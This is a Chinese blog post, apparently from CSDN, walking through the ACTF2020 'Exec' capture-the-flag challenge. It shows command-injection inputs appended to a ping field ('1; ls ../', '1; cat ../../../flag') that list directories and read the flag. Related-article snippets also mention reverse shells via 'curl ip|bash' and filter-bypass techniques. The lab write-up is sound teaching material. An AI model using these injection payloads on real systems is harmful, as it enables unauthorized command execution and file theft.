[ACTF2020 新生赛]Exec (命令执行漏洞)

最新推荐文章于 2024-06-16 00:28:55 发布
最新推荐文章于 2024-06-16 00:28:55 发布
阅读量460 收藏 9
点赞数 11
分类专栏: CTF 文章标签: linux 运维 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59233715/article/details/134951571
版权

打开题目:

ping 一下 1执行:

1; ls

得到:

并没有flag

执行:
 

1; ls ../

再往上看看:

再看看?

执行:

1; ls ../../

有不了一点!

再看看:
执行:
 

1; ls ../../../

OK了家人们看到 flag 了!

执行它!

执行:

1; cat ../../../flag

OK:

flag 来了!

Dawpro_加薪
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF命令执行题目解题思路
悦分享
08-02 713
可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操作,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行命令,因此不会影响curl的执行。在自己服务器中放入bash一句话,利用curl ip|bash反弹shell。ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中。原理就是利用curl ip|bash等很多方式去反弹shell。利用linux下特有的命令来写入shell反弹。...
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
CTF题型 nodejs(1) 命令执行绕过&典型例题
qq_39947980的博客
03-26 1337
参考:https://www.anquanke.com/post/id/237032。命令并等待 3 秒,但你不会看到任何输出或结果,因为你没有处理这个返回的对象。F12获取的是浏览器解析后的源代码,可能会包含一些动态生成的内容。在第四个字符发现非法字符,但是slice是从第四的元素开始替换。动态的一种绕过某些限制(比如模块缓存或包管理器的限制)的方法。这里是对字符操作,就是 被引号或者反引号包裹起来的字符。中的各个函数方法,再通过数组下标就可以拿到。将结果输出就可以了(就可以看到转圈)
命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass(空格,关键字过滤,变量绕过)-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping
qq_51550750的博客
02-14 829
命令执行 命令执行是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令。当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。 比如PHP中的system,exec,shell_exec等,当用户可以控制命令执行中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 简单举例来说就是,比如想要创建一个目录,可能不会用代码创建,但是知道系统命令是mkdir,借助系统命令mkdir来创建目录。 举例:cp /tmp/sourcefile /app/public
WEB攻防-通用漏洞&RCE&代码执行&命令执行&多层面检测利用
m0_65336233的博客
10-18 951
WEB攻防-通用漏洞&RCE&代码执行&命令执行&多层面检测利用
BUUCTF靶场练习——第一周
weixin_47063945的博客
07-15 771
整理了buuctf靶场前6道web题目的writeup并整理了涉及到的部分知识的整理和扩展
BUUCTF 之 [ACTF2020 新生]Exec命令执行漏洞
两个月亮
01-08 1199
这界面和这网页标题结合起来,相信给位都能猜到这个靶场中很有可能存在命令执行漏洞。文件往往位于根目录下,但也不要被反套路了。可以看到并没有我们期望的文件。这些文件夹都不需要管它,在。
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方888 573 2803程序,有详细的原理图
CTF题目合集
cgygsw的博客
01-26 2270
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
i春秋CTF ssrfme (peal函数中get命令漏洞)命令执行 详细题解+原理 学习过程
AAAAAAAAAAAA66的博客
12-16 1342
前几天刚做一道命令执行的题目累的够呛,这会刷题又碰见一道,所以做个总结,梳理一下自己学到的各方面知识。 题目 分析 <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
CTFWeb-命令执行漏洞过滤的绕过姿势
热门推荐
道阻且长,行则将至。
04-29 1万+
文章目录前言CTF题目绕过姿势命令联合执行关键词的绕过内联执行绕过多种解法变量拼接内联执行Base64编码总结 前言 为了备战(划水)5 月份广东省的 “红帽杯” 网络安全,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值: 本文目的在于结合 BU
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
appearappear的博客
06-12 275
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Linux基础命令
威桑的博客
06-11 1198
常见基础Linux命令
03_LINUX交叉编译工具链的配置过程
最新发布
qq_40681630的博客
06-16 563
交叉编译工具链是一组用于在一台计算机上生成可在不同体系结构上运行的程序的工具。通常,交叉编译工具链由以下几个组件组成:交叉编译器:交叉编译器是工具链的核心组件,用于将源代码编译为目标体系结构上的可执行文件。交叉编译器能够理解源代码和目标体系结构之间的差异,并将代码正确地转换为目标平台上的可执行文件。调试器:交叉编译工具链通常还包括一个用于调试目标体系结构上的程序的调试器。调试器可以让开发人员在目标平台上运行程序,并提供查看变量、跟踪代码执行等功能。
MySQl基础----Linux下搭建mysql软件及登录和基本使用(附实操图超简单一看就会)
溟洵的博客
06-10 796
本章非常基础包括如何在Linux上搭建(==当然上面的SQL语句你在其他能执行SQL语句的软件上也能正常执行,并非一定要在Linux环境下==)和mysql的基本使用
[ACTF2020 新生]Exec 1
09-19
关于 [ACTF2020 新生]Exec 1 的题目中的命令注入问题,根据引用的内容来分析,可以使用命令注入来解题。在这道题目中,使用命令注入的方式进行解题,首先通过测试命令 "ping 127.0.0.1" 来验证是否可以执行命令注入,接着尝试使用 "ping 127.0.0.1&ls" 命令来列出当前目录下的文件和目录,然后进一步使用 "ping 127.0.0.1&ls /" 命令来列出根目录下的文件和目录,发现了一个名为 "flag" 的文件。最后,使用 "ping 127.0.0.1&cat /flag" 命令来查看 "flag" 文件的内容,得到了 flag{f77ba906-cb55-4891-a72d-821e95de0b7d}。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dawpro_加薪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值